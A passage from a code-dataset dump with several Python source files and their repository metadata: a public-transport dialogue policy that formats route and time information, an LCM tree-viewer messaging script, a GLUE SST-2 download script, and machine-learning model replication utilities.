da.append(DialogueActItem('inform', 'from_stop', step.departure_stop))\n departure_time_rel_hrs, departure_time_rel_mins = divmod(departure_time_rel.seconds / 60, 60)\n if departure_time_rel.days > 0:\n departure_time_rel_hrs += 24 * departure_time_rel.days\n da.append(DialogueActItem('inform', 'departure_time_rel',\n '%d:%02d' % (departure_time_rel_hrs, departure_time_rel_mins)))\n break\n return da\n\n def req_arrival_time(self, dialogue_state):\n \"\"\"Return a DA informing about the arrival time the destination stop of the last\n recommended connection.\n \"\"\"\n route = dialogue_state.directions[dialogue_state.route_alternative]\n leg = route.legs[0]\n da = DialogueAct()\n for step in reversed(leg.steps):\n if step.travel_mode == step.MODE_TRANSIT:\n da.append(DialogueActItem('inform', 'to_stop', step.arrival_stop))\n da.append(DialogueActItem('inform', 'arrival_time', step.arrival_time.strftime(\"%H:%M\")))\n break\n return da\n\n def req_arrival_time_rel(self, dialogue_state):\n \"\"\"Return a DA informing about the relative arrival time the destination stop of the last\n recommended connection.\n \"\"\"\n route = dialogue_state.directions[dialogue_state.route_alternative]\n leg = route.legs[0]\n da = DialogueAct()\n for step in reversed(leg.steps):\n if step.travel_mode == step.MODE_TRANSIT:\n da.append(DialogueActItem('inform', 'to_stop', step.arrival_stop))\n # construct relative time from now to arrival\n arrival_time_rel = (step.arrival_time - datetime.now()).seconds / 60\n arrival_time_rel_hrs, arrival_time_rel_mins = divmod(arrival_time_rel, 60)\n da.append(DialogueActItem('inform', 'arrival_time_rel',\n '%d:%02d' % (arrival_time_rel_hrs, arrival_time_rel_mins)))\n break\n return da\n\n def req_duration(self, dialogue_state):\n \"\"\"Return a DA informing about journey time to the destination stop of the last\n recommended connection.\n \"\"\"\n route = dialogue_state.directions[dialogue_state.route_alternative]\n leg = route.legs[0]\n da = DialogueAct()\n for step in leg.steps:\n if step.travel_mode == step.MODE_TRANSIT:\n departure_time = step.departure_time\n break\n else:\n departure_time = datetime.fromtimestamp(0)\n\n for step in reversed(leg.steps):\n if step.travel_mode == step.MODE_TRANSIT:\n arrival_time = step.arrival_time\n break\n else:\n arrival_time = datetime.fromtimestamp(leg.steps[0].duration)\n\n duration = (arrival_time - departure_time).seconds / 60\n duration_hrs, duration_mins = divmod(duration, 60)\n da.append(DialogueActItem('inform', 'duration', '%d:%02d' % (duration_hrs, duration_mins)))\n return da\n\n def req_num_transfers(self, dialogue_state):\n \"\"\"Return a DA informing the user about the number of transfers in the\n last recommended connection.\n \"\"\"\n route = dialogue_state.directions[dialogue_state.route_alternative]\n leg = route.legs[0]\n n = sum([1 for step in leg.steps if step.travel_mode == step.MODE_TRANSIT]) - 1\n da = DialogueAct('inform(num_transfers=\"%d\")' % n)\n return da\n\n def req_time_transfers(self, dialogue_state):\n \"\"\"Return a DA informing the user about transfer places and time needed for the trasfer in the\n last recommended connection.\n \"\"\"\n route = dialogue_state.directions[dialogue_state.route_alternative]\n leg = route.legs[0]\n # get only transit with some means of transport\n transits = [step for step in route.legs[0].steps if step.travel_mode == step.MODE_TRANSIT ]\n\n # get_time counts difference between two datetime objects, returns a string h:min\n get_time = lambda f,t: '%d:%02d' % divmod(((t - f).seconds / 60), 60)\n # calculate time needed as \"departure_time from next stop minus arrival time to the stop\"\n n = [ (arrive_at.arrival_stop, get_time( arrive_at.arrival_time, depart_from.departure_time))\n for arrive_at, depart_from in itertools.izip(transits,transits[1:])]\n names = [ 'inform(time_transfers_stop=\"%s\")&inform(time_transfers_limit=\"%s\")' % tuple_n for tuple_n in n ]\n\n da = DialogueAct(\"&\".join(names)) if len(names) > 0 else DialogueAct('inform(num_transfers=\"0\")')\n return da\n\n def check_directions_conflict(self, wp):\n \"\"\"Check for conflicts in the given waypoints. Return an apology() DA if the origin and\n the destination are the same, or if a city is not compatible with the corresponding stop.\n\n :param wp: wayponts of the user's connection query\n :rtype: DialogueAct\n :return: apology dialogue act in case of conflict, or None\n \"\"\"\n # origin and destination are the same\n if (wp.from_city == wp.to_city) and (wp.from_stop in [wp.to_stop, None]):\n apology_da = DialogueAct('apology()&inform(stops_conflict=\"thesame\")')\n apology_da.extend(DialogueAct('inform(from_stop=\"%s\")&inform(to_stop=\"%s\")' %\n (wp.from_stop, wp.to_stop)))\n return apology_da\n # origin stop incompatible with origin city\n elif not self.ontology.is_compatible('city_stop', wp.from_city, wp.from_stop):\n apology_da = DialogueAct('apology()&inform(stops_conflict=\"incompatible\")')\n apology_da.extend(DialogueAct('inform(from_city=\"%s\")&inform(from_stop=\"%s\")' %\n (wp.from_city, wp.from_stop)))\n return apology_da\n # destination stop incompatible with destination city\n elif not self.ontology.is_compatible('city_stop', wp.to_city, wp.to_stop):\n apology_da = DialogueAct('apology()&inform(stops_conflict=\"incompatible\")')\n apology_da.extend(DialogueAct('inform(to_city=\"%s\")&inform(to_stop=\"%s\")' %\n (wp.to_city, wp.to_stop)))\n return apology_da\n return None\n\n def get_directions(self, ds, route_type='true', check_conflict=False):\n \"\"\"Retrieve Google directions, save them to dialogue state and return\n corresponding DAs.\n\n Responsible for the interpretation of AM/PM time expressions.\n\n :param ds: The current dialogue state\n :param route_type: a label for the found route (to be passed on to \\\n :func:`say_directions`)\n :param check_conflict: If true, will check if the origin and \\\n destination stops are different and issue a warning DA if not.\n :rtype: DialogueAct\n \"\"\"\n conn_info = ds.conn_info\n # check for route conflicts\n if check_conflict:\n apology_da = self.check_directions_conflict(conn_info)\n if apology_da is not None:\n if ds.route_alternative is not None:\n ds.directions = None\n ds.route_alternative = None\n return apology_da\n\n # get dialogue state values\n departure_time = ds['departure_time'].mpv()\n departure_time_rel = ds['departure_time_rel'].mpv()\n arrival_time = ds['arrival_time'].mpv()\n arrival_time_rel = ds['arrival_time_rel'].mpv()\n date_rel = ds['date_rel'].mpv()\n ampm = ds['ampm'].mpv()\n time = ds['time'].mpv()\n time_rel = ds['time_rel'].mpv()\n\n # interpret departure and arrival time\n departure_ts, arrival_ts = None, None\n if arrival_time != 'none' or arrival_time_rel != 'none':\n arrival_ts, _ = self.interpret_time(arrival_time, ampm, arrival_time_rel, date_rel,\n ds['lta_arrival_time'].mpv())\n else:\n lta_departure_time = ds['lta_departure_time'].mpv()\n lta_time = ds['lta_time'].mpv()\n lta_time = lta_departure_time if lta_departure_time != 'none' else lta_time\n time_abs = departure_time if departure_time != 'none' else time\n time_rel = departure_time_rel if departure_time_rel != 'none' else time_rel\n departure_ts, _ = self.interpret_time(time_abs, ampm, time_rel, date_rel, lta_time)\n\n # retrieve transit directions\n ds.directions = self.directions.get_directions(conn_info,\n departure_time=departure_ts,\n arrival_time=arrival_ts)\n return self.process_directions_for_output(ds, route_type)\n\n ORIGIN = 'ORIGIN'\n DESTIN = 'FINAL_DEST'\n\n def process_directions_for_output(self, dialogue_state, route_type):\n \"\"\"Return DAs for the directions in the current dialogue state.\n If the directions are not valid (nothing found), delete their object from the\n dialogue state and return apology DAs.\n\n :param dialogue_state: the current dialogue state\n :param route_type: the route type requested by the user (\"last\", \"next\" etc.)\n :rtype: DialogueAct\n \"\"\"\n if dialogue_state.route_alternative is None:\n dialogue_state.route_alternative = 0\n\n try:\n # get the alternative we want to say now\n route = dialogue_state.directions[dialogue_state.route_alternative]\n # only 1 leg should be present in case we have no waypoints\n steps = route.legs[0].steps\n except IndexError:\n # this will lead to apology that no route has been found\n steps = []\n #dialogue_state.directions = None\n dialogue_state.route_alternative = None\n\n res = []\n\n # introduction\n if len(dialogue_state.directions) > 1:\n res.append('inform(found_directions=\"%s\")' % route_type)\n if route_type != \"last\":\n res.append(\"inform(alternative=%d)\" % (dialogue_state.route_alternative + 1))\n\n # route description\n prev_arrive_stop = self.ORIGIN # remember previous arrival stop\n for step_ndx, step in enumerate(steps):\n\n # find out what will be the next departure stop (needed later)\n next_leave_stop = self.DESTIN\n if step_ndx < len(steps) - 2 and \\\n steps[step_ndx + 1].travel_mode == step.MODE_WALKING:\n next_leave_stop = steps[step_ndx + 2].departure_stop\n elif step_ndx < len(steps) - 1 and \\\n steps[step_ndx + 1].travel_mode == step.MODE_TRANSIT:\n next_leave_stop = steps[step_ndx + 1].departure_stop\n\n # walking\n if step.travel_mode == step.MODE_WALKING:\n # walking to stops with different names\n if (next_leave_stop == self.DESTIN and\n prev_arrive_stop != dialogue_state.directions.to_stop) or \\\n (prev_arrive_stop == self.ORIGIN and\n next_leave_stop != dialogue_state.directions.from_stop) or \\\n (next_leave_stop != self.DESTIN and\n prev_arrive_stop != self.ORIGIN and\n next_leave_stop != prev_arrive_stop):\n # walking destination: next departure stop\n res.append(\"inform(walk_to=%s)\" % next_leave_stop)\n #res.append(\"inform(duration=0:%02d)\" % (step.duration / 60))\n # public transport\n elif step.travel_mode == step.MODE_TRANSIT:\n res.append(\"inform(vehicle=%s)\" % step.vehicle)\n res.append(\"inform(line=%s)\" % step.line_name)\n res.append(\"inform(departure_time=%s)\" %\n step.departure_time.strftime(\"%H:%M\"))\n # only mention departure if it differs from previous arrival\n if step.departure_stop != prev_arrive_stop:\n res.append(\"inform(enter_at=%s)\" % step.departure_stop)\n res.append(\"inform(headsign=%s)\" % step.headsign)\n res.append(\"inform(exit_at=%s)\" % step.arrival_stop)\n # only mention transfer if there is one\n if next_leave_stop != self.DESTIN:\n res.append(\"inform(transfer='true')\")\n prev_arrive_stop = step.arrival_stop\n\n # no route found: apologize\n if len(res) == 0:\n res.append('apology()')\n res.append(dialogue_state.directions.get_minimal_info())\n\n res_da = DialogueAct(\"&\".join(res))\n\n return res_da\n\n DEFAULT_AMPM_TIMES = {'morning': \"06:00\",\n 'am': \"10:00\",\n 'pm': \"15:00\",\n 'evening': \"18:00\",\n 'night': \"00:00\"}\n\n def interpret_time(self, time_abs, time_ampm, time_rel, date_rel, lta_time):\n \"\"\"Interpret time, given current dialogue state most probable values for\n relative and absolute time and date, plus the corresponding last-talked-about value.\n\n :return: the inferred time value + flag indicating the inferred time type ('abs' or 'rel')\n :rtype: tuple(datetime, string)\n \"\"\"\n now = datetime.now()\n now += timedelta(seconds=(60 - now.second), microseconds=(-now.microsecond)) # round to next minute start\n\n # use only last-talked-about time (of any type -- departure/arrival)\n if (time_abs != 'none' or date_rel != 'none') and time_rel != 'none':\n if lta_time.endswith('time_rel'):\n time_abs = 'none'\n date_rel = 'none'\n elif lta_time.endswith('time') or lta_time == 'date_rel':\n time_rel = 'none'\n\n # remove bogus values (i.e. \"now\") from time_abs\n if not re.match('^[0-2]?[0-9]:[0-5][0-9]$', time_abs):\n time_abs = 'none'\n\n # relative time\n if (time_abs == 'none' and time_ampm == 'none' and date_rel == 'none') or time_rel != 'none':\n time_type = 'rel'\n time_abs = now\n if time_rel not in ['none', 'now']:\n trel_parse = datetime.strptime(time_rel, \"%H:%M\")\n time_abs += timedelta(hours=trel_parse.hour, minutes=trel_parse.minute)\n # absolute time (with relative date)\n else:\n time_type = 'abs'\n if time_abs == 'none':\n if time_ampm != 'none':\n time_abs = self.DEFAULT_AMPM_TIMES[time_ampm]\n elif date_rel != 'none':\n time_abs = \"%02d:%02d\" % (now.hour, now.minute)\n time_parsed = datetime.combine(now, datetime.strptime(time_abs, \"%H:%M\").time())\n time_hour = time_parsed.hour\n now_hour = now.hour\n # handle 12hr time\n if time_hour >= 1 and time_hour <= 12:\n # interpret AM/PM\n if time_ampm != 'none':\n # 'pm' ~ 12pm till 11:59pm\n if time_ampm == 'pm' and time_hour < 12:\n time_hour += 12\n # 'am'/'morning' ~ 12am till 11:59am\n elif time_ampm in ['am', 'morning'] and time_hour == 12:\n time_hour = 0\n # 'evening' ~ 4pm till 3:59am\n elif time_ampm == 'evening' and time_hour >= 4:\n time_hour = (time_hour + 12) % 24\n # 'night' ~ 6pm till 5:59am\n elif time_ampm == 'night' and time_hour >= 6:\n time_hour = (time_hour + 12) % 24\n # 12hr time + no AM/PM set + today or no date set: default to next 12hrs\n elif date_rel in ['none', 'today'] and now_hour > time_hour and now_hour < time_hour + 12:\n time_hour = (time_hour + 12) % 24\n time_abs = datetime.combine(now, dttime(time_hour, time_parsed.minute))\n # relative date\n if date_rel == 'tomorrow':\n time_abs += timedelta(days=1)\n elif date_rel == 'day_after_tomorrow':\n time_abs += timedelta(days=2)\n elif time_abs < now:\n time_abs += timedelta(days=1)\n\n return time_abs, time_type\n\n def get_limited_context_help(self, dialogue_state):\n res_da = DialogueAct()\n\n # if we do not understand the input then provide the context sensitive help\n if dialogue_state.route_alternative is None:\n # before something is offered\n if randbool(10):\n res_da.append(DialogueActItem(\"help\", \"task\", \"weather\"))\n elif randbool(10):\n res_da.append(DialogueActItem(\"help\", \"request\", \"current_time\"))\n elif randbool(10):\n res_da.append(DialogueActItem(\"help\", \"inform\", \"hangup\"))\n elif randbool(9):\n res_da.append(DialogueActItem(\"help\", \"request\", \"help\"))\n elif randbool(8):\n res_da.append(DialogueActItem(\"help\", \"inform\", \"departure_time\"))\n elif randbool(7):\n res_da.append(DialogueActItem(\"help\", \"repeat\"))\n elif not dialogue_state['from_stop'].test(\"none\", self.accept_prob, neg_val=True):\n res_da.append(DialogueActItem(\"help\", \"inform\", \"from_stop\"))\n elif not dialogue_state['to_stop'].test(\"none\", self.accept_prob, neg_val=True):\n res_da.append(DialogueActItem(\"help\", \"inform\", \"to_stop\"))\n else:\n res_da.append(DialogueActItem(\"silence\"))\n else:\n # we already offered a connection\n if randbool(4):\n res_da.append(DialogueActItem(\"help\", \"inform\", \"alternative_last\"))\n elif randbool(7):\n res_da.append(DialogueActItem(\"help\", \"inform\", \"alternative_next\"))\n elif randbool(6):\n res_da.append(DialogueActItem(\"help\", \"inform\", \"alternative_prev\"))\n elif randbool(5):\n res_da.append(DialogueActItem(\"help\", \"inform\", \"alternative_abs\"))\n elif randbool(4):\n res_da.append(DialogueActItem(\"help\", \"request\", \"from_stop\"))\n elif randbool(3):\n res_da.append(DialogueActItem(\"help\", \"request\", \"to_stop\"))\n elif randbool(2):\n res_da.append(DialogueActItem(\"help\", \"request\", \"num_transfers\"))\n else:\n res_da.append(DialogueActItem(\"silence\"))\n\n return res_da\n","repo_name":"UFAL-DSG/alex","sub_path":"alex/applications/PublicTransportInfoCS/hdc_policy.py","file_name":"hdc_policy.py","file_ext":"py","file_size_in_byte":63719,"program_lang":"python","lang":"en","doc_type":"code","stars":180,"dataset":"github-code","pt":"52"} +{"seq_id":"72327757284","text":"import sys\nsys.path.append('/usr/local/lib/python2.7/site-packages')\nimport lcm\nimport time\nimport json\n\nfrom robotlocomotion import viewer2_comms_t\n\nlc = lcm.LCM()\n\nmsg = viewer2_comms_t()\n\nmsg.format = \"treeviewer_json\"\nmsg.format_version_major = 1\nmsg.format_version_minor = 0\ndata_payload = json.dumps({\n \"timestamp\": 1486691399249288,\n \"setgeometry\": [\n {\n \"path\": [\"box_mass\"],\n \"geometry\": {\n \"type\": \"sphere\",\n \"color\": [1, 0, 0, 0.5],\n \"radius\": 0.2\n }\n }\n ],\n \"settransform\": [\n {\n \"path\": [\"box_mass\"],\n \"transform\": {\n \"translation\": [0.00745367, -0.000964868, 0.960629],\n \"quaternion\": [1, 0, 0, 0]\n }\n }\n ],\n \"delete\": []\n})\n\n# 0.00745367\n# -0.000964868\n# 0.960629\n\nmsg.data = data_payload\nmsg.num_bytes = len(data_payload)\n\n# lc.publish(\"DIRECTOR_TREE_VIEWER_REQUEST_<1>\", msg.encode())\n\ndef my_handler(channel, data):\n msg = viewer2_comms_t.decode(data)\n print(\"Received message on channel \\\"%s\\\"\" % channel)\n print(\" format = %s\" % str(msg.format))\n # print(\" position = %s\" % str(msg.position))\n # print(\" orientation = %s\" % str(msg.orientation))\n # print(\" ranges: %s\" % str(msg.ranges))\n # print(\" name = '%s'\" % msg.name)\n # print(\" enabled = %s\" % str(msg.enabled))\n print(\"\")\n\nsubscription = lc.subscribe(\"DIRECTOR_TREE_VIEWER_RESPONSE_\", my_handler)\n\ntry:\n while True:\n lc.publish(\"DIRECTOR_TREE_VIEWER_REQUEST_\", msg.encode())\n lc.handle_timeout(1000)\nexcept KeyboardInterrupt:\n pass\n\nlc.unsubscribe(subscription)\n","repo_name":"ethanweber/valkyrie_project","sub_path":"drawer.py","file_name":"drawer.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73806540004","text":"\nfrom datasets import load_dataset\nraw_datasets = load_dataset(\n \"glue\",\n \"sst2\",\n cache_dir=\"./downloaded_sst2\"\n)\n\n# get the validation dataset\nval_dataset = raw_datasets[\"validation\"]\n\n# save the val dataset to a csv file\nval_dataset.to_csv(\"val_dataset.csv\", index=False)","repo_name":"Jadiker/5980-hw1-public","sub_path":"download_dataset.py","file_name":"download_dataset.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"35346830027","text":"import xgboost as xgb\nimport lightgbm as lgb\nimport pandas as pd\nimport numpy as np\n\nimport pickle\nimport logging\n\nfrom execution_framework.utils.common_utils import read_variables, read_configuration_file\nfrom execution_framework.utils.preprocess_utils import normalize_data\nfrom execution_framework.utils.stats_utils import discretize_data\n\nfrom typing import Union\nfrom sklearn.cluster import KMeans\n\n\nlogger = logging.getLogger('MODEL PREDICTION')\n\n# Declare model types\nmodels = Union[xgb.Booster, lgb.LGBMClassifier, KMeans]\n\n\ndef load_model(trained_model_path: str, model_type: str, model_estimator: str) -> models:\n \"\"\"\n Read trained object model from disk\n\n :param trained_model_path: path of trained model\n :param model_type: classification or clustering\n :param model_estimator: estimator of model. e.g. lightgbm, xgboost, kmeans\n :return: model object\n \"\"\"\n\n logger.info(\"Loading trained model object from '{}'\".format(trained_model_path))\n\n if model_type == 'classification':\n\n if model_estimator == 'lightgbm':\n trained_model = pickle.load(open(trained_model_path, 'rb'))\n\n elif model_estimator == 'xgboost':\n trained_model = xgb.Booster(model_file=trained_model_path)\n\n else:\n logger.error(f\"{model_estimator} model is not supported in classification yet\")\n raise NotImplementedError('Model estimator supporting in classification for now: lightgbm and xgboost')\n\n elif model_type == 'clustering':\n\n if model_estimator == 'kmeans':\n trained_model = pickle.load(open(trained_model_path, 'rb'))\n else:\n logger.error(f\"{model_estimator} model is not supported in clustering yet\")\n raise NotImplementedError('Model estimator supporting in clustering for now: kmeans')\n\n else:\n logger.error(f\"{model_type} type model is not supported yet\")\n raise NotImplementedError('Model types supporting for now: classification and clustering')\n\n return trained_model\n\n\ndef prepare_df_to_predict(data: pd.DataFrame, key_columns: list, model_columns: list = None, normalize: bool = False,\n normalize_method: str = 'robust') -> Union[pd.DataFrame, np.ndarray]:\n \"\"\"\n Prepare dataframe with necessary columns and filters to replicate the model\n\n :param data: dataframe with all variables\n :param key_columns: identifiers like id's that aren't necessary to replicate model\n :param model_columns: column names in the same order in which the model was trained needed to predict\n :param normalize: when set to True, it transforms the numeric features by scaling them to a given range before\n predict\n :param normalize_method: defines the method for scaling.\n :return: dataframe prepared to replicate model\n \"\"\"\n\n logger.debug('Convert dataframe columns and key columns to lowercase')\n data.columns = map(str.lower, data.columns)\n key_columns = [c.lower() for c in key_columns]\n\n logger.info('Selecting necessary columns to replicate model')\n\n if model_columns is None:\n\n logger.debug(f\"Key columns are {', '.join(key_columns)}\")\n logger.debug('Columns to replicate model are : All columns except key columns')\n\n try:\n replica_data = data.drop(key_columns, axis=1)\n except Exception:\n logger.error(\"Can't drop key columns or identifiers from data\", exc_info=True)\n raise\n else:\n\n model_columns = [c.lower() for c in model_columns]\n logger.debug(f'Columns to replicate model are : {model_columns}')\n\n try:\n replica_data = data[model_columns].copy()\n except Exception:\n logger.error(\"Can't select models columns from data\", exc_info=True)\n raise\n\n # Normalize data if it's necessary\n if normalize:\n replica_data = normalize_data(replica_data, normalize_method)\n replica_data = replica_data.astype('float32') # temporary\n\n return replica_data\n\n\ndef predict_model(trained_model: models, model_type: str, model_estimator: str, data: pd.DataFrame) -> np.ndarray:\n \"\"\"\n Predict using trained model\n\n :param trained_model: model object\n :param model_type: classification or clustering\n :param model_estimator: estimator of model. e.g. lightgbm, xgboost, kmeans\n :param data: dataframe with variables to replicate model\n :return: probabilities resulting from the prediction\n \"\"\"\n\n logger.info('Predicting probabilities for the new data')\n\n try:\n\n if model_type == 'classification':\n\n if model_estimator == 'lightgbm':\n probabilities = trained_model.predict_proba(data)\n model_results = probabilities[:, 1]\n\n elif model_estimator == 'xgboost':\n replica_data_dmatrix = xgb.DMatrix(data)\n model_results = trained_model.predict(replica_data_dmatrix)\n\n else:\n logger.error(f\"{model_estimator} model is not supported in classification yet\")\n raise NotImplementedError('Model estimator supporting in classification for now: lightgbm and xgboost')\n\n elif model_type == 'clustering':\n\n if model_estimator == 'kmeans':\n model_results = trained_model.predict(data)\n else:\n logger.error(f\"{model_estimator} model is not supported in clustering yet\")\n raise NotImplementedError('Model estimator supporting in clustering for now: kmeans')\n\n else:\n logger.error(f\"{model_type} type model is not supported yet\")\n raise NotImplementedError('Model types supporting for now: classification and clustering')\n\n except Exception:\n logger.error(f\"Can't predict {model_estimator} model in new data, please check data quality\", exc_info=True)\n raise\n\n logger.info('Model prediction finished')\n\n return model_results\n\n\ndef common_steps_replica(input_samples: pd.DataFrame, key_columns: list, trained_model_path: str, model_type: str,\n model_estimator: str, model_columns_path: str, normalize: bool = False,\n normalize_method: str = 'robust') -> np.ndarray:\n \"\"\"\n Execute common steps to make single model replica and ensemble model replica\n\n :param input_samples: input samples with all necessary variables to replicate model\n :param key_columns: identifiers like id's that aren't necessary to replicate model\n :param trained_model_path: path of trained model\n :param model_type: classification or clustering\n :param model_estimator: estimator of model. e.g. lightgbm, xgboost, kmeans\n :param model_columns_path: column names in the same order in which the model was trained\n :param normalize: when set to True, it transforms the numeric features by scaling them to a given range before\n predict\n :param normalize_method: defines the method for scaling.\n :return:\n \"\"\"\n # Load trained file model\n trained_model = load_model(trained_model_path, model_type, model_estimator)\n\n # Read variables to replicate the model\n model_columns = read_variables(model_columns_path)\n\n # Selecting correct columns to replicate model\n replica_data = prepare_df_to_predict(input_samples, key_columns, model_columns, normalize, normalize_method)\n\n # Predict model in new data\n model_results = predict_model(trained_model, model_type, model_estimator, replica_data)\n\n return model_results\n\n\ndef create_group_column(model_results: np.ndarray, model_type: str, group_columns_type: str, quantile: int,\n fixed_intervals: list, group_labels: Union[list, dict]) -> pd.Series:\n \"\"\"\n Create group column in each type of model : classification and clustering\n\n :param model_results: output of predict model\n :param model_type: classification or clustering\n :param group_columns_type: type of group column e.g. quantile or fixed intervals. Only valid for classification\n :param quantile: number of quantiles. 10 for deciles, 4 for quartiles. If None don't create new column\n :param fixed_intervals: edges to create column with groups based on probabilities. If None don't create new column\n :param group_labels: used as labels for the resulting group column\n :return:\n \"\"\"\n\n logger.info(f'Creating group column for {model_type} model')\n\n if model_type == 'classification':\n groups = discretize_data(model_results, group_columns_type, quantile, fixed_intervals, group_labels)\n\n elif model_type == 'clustering':\n groups = pd.Series(model_results).map(group_labels)\n\n else:\n logger.error(f\"{model_type} type model is not supported yet\")\n raise NotImplementedError('Model types supporting for now: classification and clustering')\n\n return groups\n\n\ndef single_model_replica(data: pd.DataFrame, key_columns: list, trained_model_path: str, model_type: str,\n model_estimator: str, filters: str = None, model_columns_path: str = None,\n normalize: bool = False, normalize_method: str = 'robust', add_group_column: bool = True,\n group_columns_type: str = 'quantile', quantile: int = 10, fixed_intervals: list = None,\n group_labels: Union[list, np.ndarray, dict] = None) -> pd.DataFrame:\n \"\"\"\n Model prediction for all samples in replica data\n If model_columns is not specified it takes all columns except key_columns to replicate model\n\n :param data: all necessary variables to replicate model\n :param key_columns: identifiers like id's that aren't necessary to replicate model\n :param trained_model_path: path of trained model\n :param model_type: classification or clustering\n :param model_estimator: estimator of model. e.g. lightgbm, xgboost\n :param filters: filters: filters to query data\n :param model_columns_path: column names in the same order in which the model was trained\n :param normalize: when set to True, it transforms the numeric features by scaling them to a given range before\n predict\n :param normalize_method: defines the method for scaling.\n :param add_group_column: add rank column based on probabilities\n :param group_columns_type: type of group column e.g. quantile or fixed intervals\n :param quantile: number of quantiles. 10 for deciles, 4 for quartiles. If None don't create new column\n :param fixed_intervals: edges to create column with groups based on probabilities. If None don't create new column\n :param group_labels: used as labels for the resulting group column\n :return: dataframe with probabilities and key columns\n \"\"\"\n\n # Filter dataframe if it's necessary\n if filters is not None:\n\n logger.info(f'Applying filters to dataframe : {filters}')\n filtered_data = data.query(filters).reset_index(drop=True)\n\n logger.info(f'New dataframe shape is {filtered_data.shape}')\n\n else:\n filtered_data = data\n\n # Keep only key columns\n replica_result = filtered_data[key_columns].copy()\n\n # Execute common steps replica\n model_results = common_steps_replica(input_samples=filtered_data, key_columns=key_columns,\n trained_model_path=trained_model_path, model_type=model_type,\n model_estimator=model_estimator, model_columns_path=model_columns_path,\n normalize=normalize, normalize_method=normalize_method)\n\n # Add replica column to results\n replica_result['final_prob'] = model_results\n\n # Add group column\n if add_group_column:\n\n logger.info(\"Adding column group to model result\")\n replica_result['groups'] = create_group_column(model_results, model_type, group_columns_type, quantile,\n fixed_intervals, group_labels)\n\n return replica_result\n\n\ndef ensemble_model_replica(data: pd.DataFrame, models_data: dict, key_columns: list) -> pd.DataFrame:\n \"\"\"\n Generate prediction for ensemble models\n\n :param data: dataframe with all necessary variables to replicate each model\n :param models_data: model path, variables path, model type and weight of each model\n :param key_columns: identifiers like id's that aren't necessary to replicate model\n :return: dataframe with probabilities for each model and final probability\n \"\"\"\n\n # Filter dataframe if it's necessary\n if models_data.get('filter_rows') is not None:\n\n filters = models_data['filter_rows']['query']\n\n logger.info(f'Applying filters to dataframe : {filters}')\n filtered_data = data.query(filters).reset_index(drop=True)\n logger.debug(f'New dataframe shape is {filtered_data.shape}')\n else:\n filtered_data = data\n\n # Create dataframe to add all the probabilities as columns\n ensemble_replica_result = filtered_data[key_columns].reset_index(drop=True)\n ensemble_probabilities = np.zeros(ensemble_replica_result.shape[0])\n\n # Iterate over through all models\n for model_name, model_data in models_data['inner_models'].items():\n\n logger.info(f'Making replica of {model_name} model')\n\n # Execute common steps replica\n probabilities = common_steps_replica(input_samples=filtered_data, key_columns=key_columns,\n trained_model_path=model_data['model_path'],\n model_type=model_data['model_type'],\n model_estimator=model_data['model_estimator'],\n model_columns_path=model_data['model_variables'])\n\n # Add prediction as a column\n prob_column_name = 'prob_' + model_name\n ensemble_replica_result[prob_column_name] = probabilities\n\n # Create ensemble probabilities\n ensemble_probabilities += probabilities * model_data['model_weight']\n\n # Add column with final probability\n ensemble_replica_result['final_prob'] = ensemble_probabilities\n\n # Add group column\n if models_data['add_group_column']:\n groups = discretize_data(array=ensemble_probabilities,\n q=models_data.get('quantile'),\n bin_type=models_data.get('group_column_type'),\n bins=models_data.get('probability_cuts'),\n labels=models_data.get('labels'))\n ensemble_replica_result['groups'] = groups\n\n return ensemble_replica_result\n\n\ndef merge_model_results(model_results: dict, key_columns: list, merge_type: str) -> pd.DataFrame:\n \"\"\"\n Merge model results into one dataframe\n\n :param model_results: dictionary with model results with the name of the model in the key\n :param key_columns: identifiers like id's that aren't necessary to replicate models\n :param merge_type: {'same_population', 'different_population'}\n :return: merged results\n \"\"\"\n\n if merge_type == 'same_population':\n\n # Create variable to identify the first item of dict\n first_item = True\n\n logger.info(\"Merging model results of the same population\")\n\n for model_name, results in model_results.items():\n\n # Don't drop key columns only for first model result\n if first_item:\n model_results[model_name].columns = key_columns + ['prob_' + model_name, 'groups_' + model_name]\n first_item = False\n continue\n\n # Drop key columns for all model results except the first one\n model_results[model_name].drop(key_columns, axis=1, inplace=True)\n\n # Rename probability and group columns\n model_results[model_name].columns = ['prob_' + model_name, 'groups_' + model_name]\n\n merged_results = pd.concat(list(model_results.values()), axis=1)\n\n elif merge_type == 'different_population':\n\n logger.info(\"Merging model results of different populations\")\n\n merged_results = pd.concat(list(model_results.values())).reset_index(drop=True)\n\n else:\n raise NotImplementedError('Merge type supporting for now are same_population and different population')\n\n return merged_results\n\n\ndef replicate_all_models(data: pd.DataFrame, key_columns: list, conf_replica_models_path: str) -> pd.DataFrame:\n \"\"\"\n Replicate all models in configuration models file\n\n :param data: dataframe with all necessary variables to replicate all models\n :param key_columns: identifiers like id's that aren't necessary to replicate models\n :param conf_replica_models_path: path to replica configuration file with all models parameters\n :return: dataframe with the union of all replicas\n \"\"\"\n\n # Read configuration parameters from yaml file\n conf_replica_models = read_configuration_file(conf_replica_models_path)\n\n # Dictionary with all results of models\n results = dict()\n\n # Replicate all models\n for model_name, model_data in conf_replica_models['models'].items():\n\n logger.info(f'Starting replica of {model_name} model')\n\n if model_data['ensemble_model']:\n ensemble_results = ensemble_model_replica(data=data,\n models_data=model_data,\n key_columns=key_columns)\n results[model_name] = ensemble_results[key_columns + ['final_prob', 'groups']].copy()\n else:\n results[model_name] = single_model_replica(data=data, key_columns=key_columns,\n trained_model_path=model_data['model_path'],\n model_type=model_data['model_type'],\n model_estimator=model_data['model_estimator'],\n filters=model_data.get('filter_rows', {}).get('query'),\n model_columns_path=model_data['model_variables'],\n normalize=model_data.get('normalize_data'),\n normalize_method=model_data.get('normalize_method'),\n add_group_column=model_data.get('add_group_column'),\n group_columns_type=model_data.get('group_column_type'),\n quantile=model_data.get('quantile'),\n fixed_intervals=model_data.get('probability_cuts'),\n group_labels=model_data.get('labels'))\n\n logger.info('Replication of all models finished ')\n\n # Union all dataframe\n logger.info('Union all dataframes with results')\n merge_type = conf_replica_models.get('merge_type', 'different_population')\n total_replica_results = merge_model_results(results, key_columns, merge_type)\n\n return 